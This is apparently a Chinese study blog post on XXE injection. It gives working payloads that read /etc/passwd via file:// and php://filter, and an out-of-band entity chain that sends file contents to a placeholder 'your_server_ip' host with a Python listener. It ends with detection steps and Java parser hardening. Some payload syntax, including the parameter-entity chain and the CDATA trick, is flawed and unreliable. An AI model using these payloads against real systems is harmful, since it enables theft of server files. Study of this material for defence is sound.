深入剖析 XML 外部实体注入（XXE）漏洞：从原理到利用与防范

XXE 漏洞的产生主要源于应用程序在解析 XML 输入时，没有对外部实体的加载进行有效限制。当应用程序允许引用外部 DTD（文档类型定义）文件，且 XML 解析器支持多种协议（如 file 协议用于读取本地文件内容、http 协议用于获取外部资源等）时，攻击者就有了可乘之机。他们可以构造恶意的外部实体，当解析器解析包含恶意外部实体的 XML 文件时，就会导致 XXE 漏洞被触发，进而获取服务器中本应被保护的数据。

例如，下面是一个简单的 XML 文件示例：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY example "Hello, XXE!">
]>
<root>&example;</root>

在这个例子中，定义了一个内部实体example，其值为Hello, XXE!，并在root元素中进行了引用。当 XML 解析器处理这个文件时，会将&example;替换为其实际值。

而恶意攻击者可能会构造类似这样的恶意 XML：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

如果应用程序没有对外部实体加载进行限制，解析器就会尝试读取/etc/passwd文件，并将文件内容作为xxe实体的值进行替换，从而导致敏感信息泄露。

XXE 漏洞利用场景与方法

有回显的 XXE 漏洞利用

本地文件读取
- file 协议读取：对于有回显的 XXE 漏洞，利用file协议直接读取本地文件是最直接的方法。假设存在一个可利用的 XXE 漏洞点，且目标服务器运行在 Linux 系统上，我们可以构造如下 XML：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

如果漏洞存在且应用程序回显了 XML 解析结果，我们就能在回显中看到/etc/passwd文件的内容。

PHP 伪协议读取：当目标应用程序是基于 PHP 开发时，还可以使用 PHP 伪协议来读取文件流。例如：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>

这里使用php://filter伪协议对文件内容进行 Base64 编码读取，这样可以避免一些特殊字符带来的问题。在回显中得到 Base64 编码的文件内容后，解码即可获取原始文件内容。

处理特殊符号文件读取：当读取的文件包含特殊符号时，可能需要借助sedate（实际可能是CDATA，原文档可能表述有误）来处理。通过将文件内容包裹在CDATA区域内，可以避免特殊符号对 XML 解析造成干扰。例如：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///path/to/special_file.txt">
]>
<root><![CDATA[&xxe;]]></root>

无回显的 XXE 漏洞利用（外带数据通道）

无回显的 XXE 漏洞利用相对复杂，需要借助外带数据通道来提取数据，也称为带外 XML 外部实体（OOB - XXE）。

利用思路与步骤
- 首先定义一个实体，使用file协议请求本地文件内容。例如：

<!ENTITY files SYSTEM "file:///c:/windows/win.ini">

接着定义另一个参数实体，将读取的文件内容作为 URL 的一部分。由于同级参数实体内容在多数 XML 解析器中不会被解析，所以需要利用参数实体嵌套使其不同级。

<!ENTITY start "<!ENTITY send SYSTEM 'http://your_server_ip:port/?a=%files;'>">

这里通过在start实体中嵌套引用files实体，使它们不同级。然后在 DTD 中先引用start，再引用send。

<!DOCTYPE root [
    %start;
    %send;
]>
<root>&send;</root>

最后在本地监听指定端口（如 8998），使用 Python 开启一个简单的 HTTP 服务：

python -m http.server 8998

当目标服务器解析这个恶意 XML 时，就会将文件内容作为 URL 参数发送到本地监听端口，我们就能在本地获取到目标文件内容。

XXE 漏洞的检测与防范

漏洞检测方法

寻找 XML 输入点：首先要找到应用程序中能够接受 XML 作为输入内容的端点。常见的如登录接口，一些应用程序可能原本使用 JSON 格式传输数据，但通过修改 HTTP 头部的Content-Type字段为application/xml，尝试将请求数据改为 XML 格式，如果应用程序能够解析，就有可能存在 XXE 漏洞。
检测外部实体引用：如果确定站点能够解析 XML，接下来尝试引用实体和 DTD。定义一个外部参数实体，如：

<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://your_server_ip/xxe.dtd">
]>
<root>&xxe;</root>

然后在自己的服务器上准备好对应的xxe.dtd文件，如果应用程序能够解析并回显相关内容，就说明存在 XXE 漏洞。

漏洞防范措施

禁用外部实体加载：在应用程序的 XML 解析配置中，明确禁用外部实体加载。例如，在 Java 中使用DocumentBuilderFactory时，可以通过设置setFeature方法来禁用外部实体：

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

严格校验输入数据：对所有 XML 输入数据进行严格校验，确保数据格式和内容符合预期，不包含恶意的实体引用或 DTD 定义。可以使用 XML Schema 或 DTD 来验证 XML 文档的结构和内容合法性。

总结与思考

通过这次课程考核讲解，我对 XXE 漏洞有了更深入的理解。从漏洞的原理、利用场景到检测与防范，每一个环节都紧密相连。在实际的网络安全工作中，我们不仅要掌握这些知识来发现和修复漏洞，更要时刻保持警惕，不断学习新的漏洞利用和防范技术，以应对日益复杂的网络安全环境。希望这篇博客能帮助大家更好地理解 XXE 漏洞，也欢迎大家在评论区分享自己的学习心得和经验。